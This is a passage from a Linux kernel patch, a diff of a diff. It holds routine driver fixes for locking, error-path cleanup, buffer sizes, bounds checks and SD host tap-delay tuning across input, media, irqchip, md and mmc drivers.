+ 			event, ndev->name);
+ 		break;
+ 	}
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_vlan.c b/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
+index 4bd161e86f8dd..562df2b3ef187 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
+@@ -184,8 +184,12 @@ int ipoib_vlan_add(struct net_device *pdev, unsigned short pkey)
+ 
+ 	ppriv = ipoib_priv(pdev);
+ 
+-	snprintf(intf_name, sizeof(intf_name), "%s.%04x",
+-		 ppriv->dev->name, pkey);
++	/* If you increase IFNAMSIZ, update snprintf below
++	 * to allow longer names.
++	 */
++	BUILD_BUG_ON(IFNAMSIZ != 16);
++	snprintf(intf_name, sizeof(intf_name), "%.10s.%04x", ppriv->dev->name,
++		 pkey);
+ 
+ 	ndev = ipoib_intf_alloc(ppriv->ca, ppriv->port, intf_name);
+ 	if (IS_ERR(ndev)) {
+diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c
+index b2f1292e27ef7..180d90e46061e 100644
+--- a/drivers/input/misc/ims-pcu.c
++++ b/drivers/input/misc/ims-pcu.c
+@@ -42,8 +42,8 @@ struct ims_pcu_backlight {
+ #define IMS_PCU_PART_NUMBER_LEN		15
+ #define IMS_PCU_SERIAL_NUMBER_LEN	8
+ #define IMS_PCU_DOM_LEN			8
+-#define IMS_PCU_FW_VERSION_LEN		(9 + 1)
+-#define IMS_PCU_BL_VERSION_LEN		(9 + 1)
++#define IMS_PCU_FW_VERSION_LEN		16
++#define IMS_PCU_BL_VERSION_LEN		16
+ #define IMS_PCU_BL_RESET_REASON_LEN	(2 + 1)
+ 
+ #define IMS_PCU_PCU_B_DEVICE_ID		5
+diff --git a/drivers/input/misc/pm8xxx-vibrator.c b/drivers/input/misc/pm8xxx-vibrator.c
+index 53ad25eaf1a28..8bfe5c7b1244c 100644
+--- a/drivers/input/misc/pm8xxx-vibrator.c
++++ b/drivers/input/misc/pm8xxx-vibrator.c
+@@ -14,7 +14,8 @@
+ 
+ #define VIB_MAX_LEVEL_mV	(3100)
+ #define VIB_MIN_LEVEL_mV	(1200)
+-#define VIB_MAX_LEVELS		(VIB_MAX_LEVEL_mV - VIB_MIN_LEVEL_mV)
++#define VIB_PER_STEP_mV		(100)
++#define VIB_MAX_LEVELS		(VIB_MAX_LEVEL_mV - VIB_MIN_LEVEL_mV + VIB_PER_STEP_mV)
+ 
+ #define MAX_FF_SPEED		0xff
+ 
+@@ -118,10 +119,10 @@ static void pm8xxx_work_handler(struct work_struct *work)
+ 		vib->active = true;
+ 		vib->level = ((VIB_MAX_LEVELS * vib->speed) / MAX_FF_SPEED) +
+ 						VIB_MIN_LEVEL_mV;
+-		vib->level /= 100;
++		vib->level /= VIB_PER_STEP_mV;
+ 	} else {
+ 		vib->active = false;
+-		vib->level = VIB_MIN_LEVEL_mV / 100;
++		vib->level = VIB_MIN_LEVEL_mV / VIB_PER_STEP_mV;
+ 	}
+ 
+ 	pm8xxx_vib_set(vib, vib->active);
+diff --git a/drivers/input/mouse/cyapa.c b/drivers/input/mouse/cyapa.c
+index 77cc653edca22..e401934df4642 100644
+--- a/drivers/input/mouse/cyapa.c
++++ b/drivers/input/mouse/cyapa.c
+@@ -1357,10 +1357,16 @@ static int __maybe_unused cyapa_suspend(struct device *dev)
+ 	u8 power_mode;
+ 	int error;
+ 
+-	error = mutex_lock_interruptible(&cyapa->state_sync_lock);
++	error = mutex_lock_interruptible(&cyapa->input->mutex);
+ 	if (error)
+ 		return error;
+ 
++	error = mutex_lock_interruptible(&cyapa->state_sync_lock);
++	if (error) {
++		mutex_unlock(&cyapa->input->mutex);
++		return error;
++	}
++
+ 	/*
+ 	 * Runtime PM is enable only when device is in operational mode and
+ 	 * users in use, so need check it before disable it to
+@@ -1395,6 +1401,8 @@ static int __maybe_unused cyapa_suspend(struct device *dev)
+ 		cyapa->irq_wake = (enable_irq_wake(client->irq) == 0);
+ 
+ 	mutex_unlock(&cyapa->state_sync_lock);
++	mutex_unlock(&cyapa->input->mutex);
++
+ 	return 0;
+ }
+ 
+@@ -1404,6 +1412,7 @@ static int __maybe_unused cyapa_resume(struct device *dev)
+ 	struct cyapa *cyapa = i2c_get_clientdata(client);
+ 	int error;
+ 
++	mutex_lock(&cyapa->input->mutex);
+ 	mutex_lock(&cyapa->state_sync_lock);
+ 
+ 	if (device_may_wakeup(dev) && cyapa->irq_wake) {
+@@ -1422,6 +1431,7 @@ static int __maybe_unused cyapa_resume(struct device *dev)
+ 	enable_irq(client->irq);
+ 
+ 	mutex_unlock(&cyapa->state_sync_lock);
++	mutex_unlock(&cyapa->input->mutex);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/input/serio/ioc3kbd.c b/drivers/input/serio/ioc3kbd.c
+index d51bfe912db5b..676b0bda3d720 100644
+--- a/drivers/input/serio/ioc3kbd.c
++++ b/drivers/input/serio/ioc3kbd.c
+@@ -190,7 +190,7 @@ static int ioc3kbd_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int ioc3kbd_remove(struct platform_device *pdev)
++static void ioc3kbd_remove(struct platform_device *pdev)
+ {
+ 	struct ioc3kbd_data *d = platform_get_drvdata(pdev);
+ 
+@@ -198,13 +198,18 @@ static int ioc3kbd_remove(struct platform_device *pdev)
+ 
+ 	serio_unregister_port(d->kbd);
+ 	serio_unregister_port(d->aux);
+-
+-	return 0;
+ }
+ 
++static const struct platform_device_id ioc3kbd_id_table[] = {
++	{ "ioc3-kbd", },
++	{ }
++};
++MODULE_DEVICE_TABLE(platform, ioc3kbd_id_table);
++
+ static struct platform_driver ioc3kbd_driver = {
+ 	.probe          = ioc3kbd_probe,
+-	.remove         = ioc3kbd_remove,
++	.remove_new     = ioc3kbd_remove,
++	.id_table	= ioc3kbd_id_table,
+ 	.driver = {
+ 		.name = "ioc3-kbd",
+ 	},
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 82a2698ad66b1..ca7ad37ea6777 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -164,7 +164,7 @@ static struct qcom_icc_node mas_snoc_bimc = {
+ 	.name = "mas_snoc_bimc",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 6,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+ 	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index fc1ef7de37973..c9ffd69dfc756 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -165,7 +165,7 @@ static int alpine_msix_middle_domain_alloc(struct irq_domain *domain,
+ 	return 0;
+ 
+ err_sgi:
+-	irq_domain_free_irqs_parent(domain, virq, i - 1);
++	irq_domain_free_irqs_parent(domain, virq, i);
+ 	alpine_msix_free_sgi(priv, sgi, nr_irqs);
+ 	return err;
+ }
+diff --git a/drivers/irqchip/irq-loongson-pch-msi.c b/drivers/irqchip/irq-loongson-pch-msi.c
+index a72ede90ffc69..8b642927b522b 100644
+--- a/drivers/irqchip/irq-loongson-pch-msi.c
++++ b/drivers/irqchip/irq-loongson-pch-msi.c
+@@ -136,7 +136,7 @@ static int pch_msi_middle_domain_alloc(struct irq_domain *domain,
+ 
+ err_hwirq:
+ 	pch_msi_free_hwirq(priv, hwirq, nr_irqs);
+-	irq_domain_free_irqs_parent(domain, virq, i - 1);
++	irq_domain_free_irqs_parent(domain, virq, i);
+ 
+ 	return err;
+ }
+diff --git a/drivers/macintosh/via-macii.c b/drivers/macintosh/via-macii.c
+index db9270da5b8e9..b6ddf1d47cb4e 100644
+--- a/drivers/macintosh/via-macii.c
++++ b/drivers/macintosh/via-macii.c
+@@ -140,24 +140,19 @@ static int macii_probe(void)
+ /* Initialize the driver */
+ static int macii_init(void)
+ {
+-	unsigned long flags;
+ 	int err;
+ 
+-	local_irq_save(flags);
+-
+ 	err = macii_init_via();
+ 	if (err)
+-		goto out;
++		return err;
+ 
+ 	err = request_irq(IRQ_MAC_ADB, macii_interrupt, 0, "ADB",
+ 			  macii_interrupt);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+ 	macii_state = idle;
+-out:
+-	local_irq_restore(flags);
+-	return err;
++	return 0;
+ }
+ 
+ /* initialize the hardware */
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 5200bba63708e..9d8ac04c23462 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -1352,7 +1352,7 @@ __acquires(bitmap->lock)
+ 	sector_t chunk = offset >> bitmap->chunkshift;
+ 	unsigned long page = chunk >> PAGE_COUNTER_SHIFT;
+ 	unsigned long pageoff = (chunk & PAGE_COUNTER_MASK) << COUNTER_BYTE_SHIFT;
+-	sector_t csize;
++	sector_t csize = ((sector_t)1) << bitmap->chunkshift;
+ 	int err;
+ 
+ 	if (page >= bitmap->pages) {
+@@ -1361,6 +1361,7 @@ __acquires(bitmap->lock)
+ 		 * End-of-device while looking for a whole page or
+ 		 * user set a huge number to sysfs bitmap_set_bits.
+ 		 */
++		*blocks = csize - (offset & (csize - 1));
+ 		return NULL;
+ 	}
+ 	err = md_bitmap_checkpage(bitmap, page, create, 0);
+@@ -1369,8 +1370,7 @@ __acquires(bitmap->lock)
+ 	    bitmap->bp[page].map == NULL)
+ 		csize = ((sector_t)1) << (bitmap->chunkshift +
+ 					  PAGE_COUNTER_SHIFT);
+-	else
+-		csize = ((sector_t)1) << bitmap->chunkshift;
++
+ 	*blocks = csize - (offset & (csize - 1));
+ 
+ 	if (err < 0)
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index c761ac35e120d..a5e5f6a4af917 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -490,6 +490,15 @@ int cec_thread_func(void *_adap)
+ 			goto unlock;
+ 		}
+ 
++		if (adap->transmit_in_progress &&
++		    adap->transmit_in_progress_aborted) {
++			if (adap->transmitting)
++				cec_data_cancel(adap->transmitting,
++						CEC_TX_STATUS_ABORTED, 0);
++			adap->transmit_in_progress = false;
++			adap->transmit_in_progress_aborted = false;
++			goto unlock;
++		}
+ 		if (adap->transmit_in_progress && timeout) {
+ 			/*
+ 			 * If we timeout, then log that. Normally this does
+@@ -744,6 +753,7 @@ int cec_transmit_msg_fh(struct cec_adapter *adap, struct cec_msg *msg,
+ {
+ 	struct cec_data *data;
+ 	bool is_raw = msg_is_raw(msg);
++	int err;
+ 
+ 	if (adap->devnode.unregistered)
+ 		return -ENODEV;
+@@ -908,11 +918,13 @@ int cec_transmit_msg_fh(struct cec_adapter *adap, struct cec_msg *msg,
+ 	 * Release the lock and wait, retake the lock afterwards.
+ 	 */
+ 	mutex_unlock(&adap->lock);
+-	wait_for_completion_killable(&data->c);
+-	if (!data->completed)
+-		cancel_delayed_work_sync(&data->work);
++	err = wait_for_completion_killable(&data->c);
++	cancel_delayed_work_sync(&data->work);
+ 	mutex_lock(&adap->lock);
+ 
++	if (err)
++		adap->transmit_in_progress_aborted = true;
++
+ 	/* Cancel the transmit if it was interrupted */
+ 	if (!data->completed) {
+ 		if (data->msg.tx_status & CEC_TX_STATUS_OK)
+@@ -1545,9 +1557,12 @@ static int cec_config_thread_func(void *arg)
+  */
+ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+ {
+-	if (WARN_ON(adap->is_configuring || adap->is_configured))
++	if (WARN_ON(adap->is_claiming_log_addrs ||
++		    adap->is_configuring || adap->is_configured))
+ 		return;
+ 
++	adap->is_claiming_log_addrs = true;
++
+ 	init_completion(&adap->config_completion);
+ 
+ 	/* Ready to kick off the thread */
+@@ -1562,6 +1577,7 @@ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+ 		wait_for_completion(&adap->config_completion);
+ 		mutex_lock(&adap->lock);
+ 	}
++	adap->is_claiming_log_addrs = false;
+ }
+ 
+ /*
+diff --git a/drivers/media/cec/core/cec-api.c b/drivers/media/cec/core/cec-api.c
+index 67dc79ef17050..3ef9153443044 100644
+--- a/drivers/media/cec/core/cec-api.c
++++ b/drivers/media/cec/core/cec-api.c
+@@ -178,7 +178,7 @@ static long cec_adap_s_log_addrs(struct cec_adapter *adap, struct cec_fh *fh,
+ 			   CEC_LOG_ADDRS_FL_ALLOW_RC_PASSTHRU |
+ 			   CEC_LOG_ADDRS_FL_CDC_ONLY;
+ 	mutex_lock(&adap->lock);
+-	if (!adap->is_configuring &&
++	if (!adap->is_claiming_log_addrs && !adap->is_configuring &&
+ 	    (!log_addrs.num_log_addrs || !adap->is_configured) &&
+ 	    !cec_is_busy(adap, fh)) {
+ 		err = __cec_s_log_addrs(adap, &log_addrs, block);
+@@ -664,6 +664,8 @@ static int cec_release(struct inode *inode, struct file *filp)
+ 		list_del_init(&data->xfer_list);
+ 	}
+ 	mutex_unlock(&adap->lock);
++
++	mutex_lock(&fh->lock);
+ 	while (!list_empty(&fh->msgs)) {
+ 		struct cec_msg_entry *entry =
+ 			list_first_entry(&fh->msgs, struct cec_msg_entry, list);
+@@ -681,6 +683,7 @@ static int cec_release(struct inode *inode, struct file *filp)
+ 			kfree(entry);
+ 		}
+ 	}
++	mutex_unlock(&fh->lock);
+ 	kfree(fh);
+ 
+ 	cec_put_device(devnode);
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 1bbe58b24d99d..2ae7130880533 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1798,11 +1798,6 @@ static int cio2_pci_probe(struct pci_dev *pci_dev,
+ 
+ 	v4l2_async_nf_init(&cio2->notifier);
+ 
+-	/* Register notifier for subdevices we care */
+-	r = cio2_parse_firmware(cio2);
+-	if (r)
+-		goto fail_clean_notifier;
+-
+ 	r = devm_request_irq(dev, pci_dev->irq, cio2_irq, IRQF_SHARED,
+ 			     CIO2_NAME, cio2);
+ 	if (r) {
+@@ -1810,6 +1805,11 @@ static int cio2_pci_probe(struct pci_dev *pci_dev,
+ 		goto fail_clean_notifier;
+ 	}
+ 
++	/* Register notifier for subdevices we care */
++	r = cio2_parse_firmware(cio2);
++	if (r)
++		goto fail_clean_notifier;
++
+ 	pm_runtime_put_noidle(dev);
+ 	pm_runtime_allow(dev);
+ 
+diff --git a/drivers/media/pci/ngene/ngene-core.c b/drivers/media/pci/ngene/ngene-core.c
+index 7481f553f9595..24ec576dc3bff 100644
+--- a/drivers/media/pci/ngene/ngene-core.c
++++ b/drivers/media/pci/ngene/ngene-core.c
+@@ -1488,7 +1488,9 @@ static int init_channel(struct ngene_channel *chan)
+ 	}
+ 
+ 	if (dev->ci.en && (io & NGENE_IO_TSOUT)) {
+-		dvb_ca_en50221_init(adapter, dev->ci.en, 0, 1);
++		ret = dvb_ca_en50221_init(adapter, dev->ci.en, 0, 1);
++		if (ret != 0)
++			goto err;
+ 		set_transfer(chan, 1);
+ 		chan->dev->channel[2].DataFormatFlags = DF_SWAP32;
+ 		set_transfer(&chan->dev->channel[2], 1);
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-vin.h b/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
+index 1f94589d9ef14..0b144ed643791 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
+@@ -58,7 +58,7 @@ enum rvin_isp_id {
+ 
+ #define RVIN_REMOTES_MAX \
+ 	(((unsigned int)RVIN_CSI_MAX) > ((unsigned int)RVIN_ISP_MAX) ? \
+-	 RVIN_CSI_MAX : RVIN_ISP_MAX)
++	 (unsigned int)RVIN_CSI_MAX : (unsigned int)RVIN_ISP_MAX)
+ 
+ /**
+  * enum rvin_dma_state - DMA states
+diff --git a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
+index 47a8c0fb7eb9f..99c401e653bc4 100644
+--- a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
++++ b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
+@@ -8,6 +8,7 @@ config VIDEO_SUN8I_A83T_MIPI_CSI2
+ 	select VIDEO_V4L2_SUBDEV_API
+ 	select V4L2_FWNODE
+ 	select REGMAP_MMIO
++	select GENERIC_PHY
+ 	select GENERIC_PHY_MIPI_DPHY
+ 	help
+ 	   Support for the Allwinner A83T MIPI CSI-2 controller and D-PHY.
+diff --git a/drivers/media/radio/radio-shark2.c b/drivers/media/radio/radio-shark2.c
+index f1c5c0a6a335c..e3e6aa87fe081 100644
+--- a/drivers/media/radio/radio-shark2.c
++++ b/drivers/media/radio/radio-shark2.c
+@@ -62,7 +62,7 @@ struct shark_device {
+ #ifdef SHARK_USE_LEDS
+ 	struct work_struct led_work;
+ 	struct led_classdev leds[NO_LEDS];
+-	char led_names[NO_LEDS][32];
++	char led_names[NO_LEDS][64];
+ 	atomic_t brightness[NO_LEDS];
+ 	unsigned long brightness_new;
+ #endif
+diff --git a/drivers/media/usb/b2c2/flexcop-usb.c b/drivers/media/usb/b2c2/flexcop-usb.c
+index 790787f0eba84..bcb24d8964981 100644
+--- a/drivers/media/usb/b2c2/flexcop-usb.c
++++ b/drivers/media/usb/b2c2/flexcop-usb.c
+@@ -515,7 +515,7 @@ static int flexcop_usb_init(struct flexcop_usb *fc_usb)
+ 
+ 	alt = fc_usb->uintf->cur_altsetting;
+ 
+-	if (alt->desc.bNumEndpoints < 1)
++	if (alt->desc.bNumEndpoints < 2)
+ 		return -ENODEV;
+ 	if (!usb_endpoint_is_isoc_in(&alt->endpoint[0].desc))
+ 		return -ENODEV;
+diff --git a/drivers/media/usb/stk1160/stk1160-video.c b/drivers/media/usb/stk1160/stk1160-video.c
+index 366f0e4a5dc0d..e79c45db60ab5 100644
+--- a/drivers/media/usb/stk1160/stk1160-video.c
++++ b/drivers/media/usb/stk1160/stk1160-video.c
+@@ -99,7 +99,7 @@ void stk1160_buffer_done(struct stk1160 *dev)
+ static inline
+ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ {
+-	int linesdone, lineoff, lencopy;
++	int linesdone, lineoff, lencopy, offset;
+ 	int bytesperline = dev->width * 2;
+ 	struct stk1160_buffer *buf = dev->isoc_ctl.buf;
+ 	u8 *dst = buf->mem;
+@@ -139,8 +139,13 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 	 * Check if we have enough space left in the buffer.
+ 	 * In that case, we force loop exit after copy.
+ 	 */
+-	if (lencopy > buf->bytesused - buf->length) {
+-		lencopy = buf->bytesused - buf->length;
++	offset = dst - (u8 *)buf->mem;
++	if (offset > buf->length) {
++		dev_warn_ratelimited(dev->dev, "out of bounds offset\n");
++		return;
++	}
++	if (lencopy > buf->length - offset) {
++		lencopy = buf->length - offset;
+ 		remain = lencopy;
+ 	}
+ 
+@@ -182,8 +187,13 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 		 * Check if we have enough space left in the buffer.
+ 		 * In that case, we force loop exit after copy.
+ 		 */
+-		if (lencopy > buf->bytesused - buf->length) {
+-			lencopy = buf->bytesused - buf->length;
++		offset = dst - (u8 *)buf->mem;
++		if (offset > buf->length) {
++			dev_warn_ratelimited(dev->dev, "offset out of bounds\n");
++			return;
++		}
++		if (lencopy > buf->length - offset) {
++			lencopy = buf->length - offset;
+ 			remain = lencopy;
+ 		}
+ 
+diff --git a/drivers/misc/vmw_vmci/vmci_guest.c b/drivers/misc/vmw_vmci/vmci_guest.c
+index 4f8d962bb5b2a..1300ccab3d21b 100644
+--- a/drivers/misc/vmw_vmci/vmci_guest.c
++++ b/drivers/misc/vmw_vmci/vmci_guest.c
+@@ -625,7 +625,8 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	if (!vmci_dev) {
+ 		dev_err(&pdev->dev,
+ 			"Can't allocate memory for VMCI device\n");
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto err_unmap_mmio_base;
+ 	}
+ 
+ 	vmci_dev->dev = &pdev->dev;
+@@ -642,7 +643,8 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 		if (!vmci_dev->tx_buffer) {
+ 			dev_err(&pdev->dev,
+ 				"Can't allocate memory for datagram tx buffer\n");
+-			return -ENOMEM;
++			error = -ENOMEM;
++			goto err_unmap_mmio_base;
+ 		}
+ 
+ 		vmci_dev->data_buffer = dma_alloc_coherent(&pdev->dev, VMCI_DMA_DG_BUFFER_SIZE,
+@@ -893,6 +895,10 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ err_free_data_buffers:
+ 	vmci_free_dg_buffers(vmci_dev);
+ 
++err_unmap_mmio_base:
++	if (mmio_base != NULL)
++		pci_iounmap(pdev, mmio_base);
++
+ 	/* The rest are managed resources and will be freed by PCI core */
+ 	return error;
+ }
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index c16dbe64859e6..52d6cc07e38cc 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -140,19 +140,26 @@ static const struct timing_data td[] = {
+ 
+ struct sdhci_am654_data {
+ 	struct regmap *base;
+-	bool legacy_otapdly;
+ 	int otap_del_sel[ARRAY_SIZE(td)];
+ 	int itap_del_sel[ARRAY_SIZE(td)];
++	u32 itap_del_ena[ARRAY_SIZE(td)];
+ 	int clkbuf_sel;
+ 	int trm_icp;
+ 	int drv_strength;
+ 	int strb_sel;
+ 	u32 flags;
+ 	u32 quirks;
++	bool dll_enable;
+ 
+ #define SDHCI_AM654_QUIRK_FORCE_CDTEST BIT(0)
+ };
+ 
++struct window {
++	u8 start;
++	u8 end;
++	u8 length;
++};
++
+ struct sdhci_am654_driver_data {
+ 	const struct sdhci_pltfm_data *pdata;
+ 	u32 flags;
+@@ -232,11 +239,13 @@ static void sdhci_am654_setup_dll(struct sdhci_host *host, unsigned int clock)
+ }
+ 
+ static void sdhci_am654_write_itapdly(struct sdhci_am654_data *sdhci_am654,
+-				      u32 itapdly)
++				      u32 itapdly, u32 enable)
+ {
+ 	/* Set ITAPCHGWIN before writing to ITAPDLY */
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK,
+ 			   1 << ITAPCHGWIN_SHIFT);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYENA_MASK,
++			   enable << ITAPDLYENA_SHIFT);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYSEL_MASK,
+ 			   itapdly << ITAPDLYSEL_SHIFT);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK, 0);
+@@ -253,8 +262,8 @@ static void sdhci_am654_setup_delay_chain(struct sdhci_am654_data *sdhci_am654,
+ 	mask = SELDLYTXCLK_MASK | SELDLYRXCLK_MASK;
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, mask, val);
+ 
+-	sdhci_am654_write_itapdly(sdhci_am654,
+-				  sdhci_am654->itap_del_sel[timing]);
++	sdhci_am654_write_itapdly(sdhci_am654, sdhci_am654->itap_del_sel[timing],
++				  sdhci_am654->itap_del_ena[timing]);
+ }
+ 
+ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+@@ -263,7 +272,6 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+ 	unsigned char timing = host->mmc->ios.timing;
+ 	u32 otap_del_sel;
+-	u32 otap_del_ena;
+ 	u32 mask, val;
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL1, ENDLL_MASK, 0);
+@@ -271,15 +279,10 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	sdhci_set_clock(host, clock);
+ 
+ 	/* Setup DLL Output TAP delay */
+-	if (sdhci_am654->legacy_otapdly)
+-		otap_del_sel = sdhci_am654->otap_del_sel[0];
+-	else
+-		otap_del_sel = sdhci_am654->otap_del_sel[timing];
+-
+-	otap_del_ena = (timing > MMC_TIMING_UHS_SDR25) ? 1 : 0;
++	otap_del_sel = sdhci_am654->otap_del_sel[timing];
+ 
+ 	mask = OTAPDLYENA_MASK | OTAPDLYSEL_MASK;
+-	val = (otap_del_ena << OTAPDLYENA_SHIFT) |
++	val = (0x1 << OTAPDLYENA_SHIFT) |
+ 	      (otap_del_sel << OTAPDLYSEL_SHIFT);
+ 
+ 	/* Write to STRBSEL for HS400 speed mode */
+@@ -294,10 +297,21 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
+ 
+-	if (timing > MMC_TIMING_UHS_SDR25 && clock >= CLOCK_TOO_SLOW_HZ)
++	if (timing > MMC_TIMING_UHS_SDR25 && clock >= CLOCK_TOO_SLOW_HZ) {
+ 		sdhci_am654_setup_dll(host, clock);
+-	else
++		sdhci_am654->dll_enable = true;
++
++		if (timing == MMC_TIMING_MMC_HS400) {
++			sdhci_am654->itap_del_ena[timing] = 0x1;
++			sdhci_am654->itap_del_sel[timing] = sdhci_am654->itap_del_sel[timing - 1];
++		}
++
++		sdhci_am654_write_itapdly(sdhci_am654, sdhci_am654->itap_del_sel[timing],
++					  sdhci_am654->itap_del_ena[timing]);
++	} else {
+ 		sdhci_am654_setup_delay_chain(sdhci_am654, timing);
++		sdhci_am654->dll_enable = false;
++	}
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, CLKBUFSEL_MASK,
+ 			   sdhci_am654->clkbuf_sel);
+@@ -310,19 +324,29 @@ static void sdhci_j721e_4bit_set_clock(struct sdhci_host *host,
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+ 	unsigned char timing = host->mmc->ios.timing;
+ 	u32 otap_del_sel;
++	u32 itap_del_ena;
++	u32 itap_del_sel;
+ 	u32 mask, val;
+ 
+ 	/* Setup DLL Output TAP delay */
+-	if (sdhci_am654->legacy_otapdly)
+-		otap_del_sel = sdhci_am654->otap_del_sel[0];
+-	else
+-		otap_del_sel = sdhci_am654->otap_del_sel[timing];
++	otap_del_sel = sdhci_am654->otap_del_sel[timing];
+ 
+ 	mask = OTAPDLYENA_MASK | OTAPDLYSEL_MASK;
+ 	val = (0x1 << OTAPDLYENA_SHIFT) |
+ 	      (otap_del_sel << OTAPDLYSEL_SHIFT);
+-	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
+ 
++	/* Setup Input TAP delay */
++	itap_del_ena = sdhci_am654->itap_del_ena[timing];
++	itap_del_sel = sdhci_am654->itap_del_sel[timing];
++
++	mask |= ITAPDLYENA_MASK | ITAPDLYSEL_MASK;
++	val |= (itap_del_ena << ITAPDLYENA_SHIFT) |
++	       (itap_del_sel << ITAPDLYSEL_SHIFT);
++
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK,
++			   1 << ITAPCHGWIN_SHIFT);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK, 0);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, CLKBUFSEL_MASK,
+ 			   sdhci_am654->clkbuf_sel);
+ 
+@@ -415,40 +439,105 @@ static u32 sdhci_am654_cqhci_irq(struct sdhci_host *host, u32 intmask)
+ 	return 0;
+ }
+ 
+-#define ITAP_MAX	32
++#define ITAPDLY_LENGTH 32
++#define ITAPDLY_LAST_INDEX (ITAPDLY_LENGTH - 1)
++
++static u32 sdhci_am654_calculate_itap(struct sdhci_host *host, struct window
++			  *fail_window, u8 num_fails, bool circular_buffer)
++{
++	u8 itap = 0, start_fail = 0, end_fail = 0, pass_length = 0;
++	u8 first_fail_start = 0, last_fail_end = 0;
++	struct device *dev = mmc_dev(host->mmc);
++	struct window pass_window = {0, 0, 0};
++	int prev_fail_end = -1;
++	u8 i;
++
++	if (!num_fails)
++		return ITAPDLY_LAST_INDEX >> 1;
++
++	if (fail_window->length == ITAPDLY_LENGTH) {
++		dev_err(dev, "No passing ITAPDLY, return 0\n");
++		return 0;
++	}
++
++	first_fail_start = fail_window->start;
++	last_fail_end = fail_window[num_fails - 1].end;
++
++	for (i = 0; i < num_fails; i++) {
++		start_fail = fail_window[i].start;
++		end_fail = fail_window[i].end;
++		pass_length = start_fail - (prev_fail_end + 1);
++
++		if (pass_length > pass_window.length) {
++			pass_window.start = prev_fail_end + 1;
++			pass_window.length = pass_length;
++		}
++		prev_fail_end = end_fail;
++	}
++
++	if (!circular_buffer)
++		pass_length = ITAPDLY_LAST_INDEX - last_fail_end;
++	else
++		pass_length = ITAPDLY_LAST_INDEX - last_fail_end + first_fail_start;
++
++	if (pass_length > pass_window.length) {
++		pass_window.start = last_fail_end + 1;
++		pass_window.length = pass_length;
++	}
++
++	if (!circular_buffer)
++		itap = pass_window.start + (pass_window.length >> 1);
++	else
